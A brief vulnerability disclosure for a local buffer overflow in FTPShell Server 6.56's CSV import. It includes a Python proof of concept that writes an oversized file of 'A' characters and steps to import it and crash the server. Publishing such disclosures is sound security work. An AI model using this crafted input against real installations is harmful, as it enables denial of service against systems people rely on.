[+] Title: FTPShell Server 6.56 - Import CSV Buffer Overflow
[+] Credits / Discovery: Nassim Asrir
[+] Author Email: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/
[+] Author Company: Henceforth
[+] CVE: N/A
Vendor:
===============
www.ftpshell.com
Download:
===========
http://www.ftpshell.com/download.htm
Vulnerability Type:
===================
Local Buffer Overflow.
POC:
======
Dos = "A"*2047
file=open("C:\\shell.csv","w")
file.write(Dos)
file.close()
1 - Manage FTP Accounts => Import From CSV = > Browse and import shell.csv = > Click in Import and Crashed :).
CVE Reference:
===============
N/A
Tested on:
===============
Windows 7
Win xp
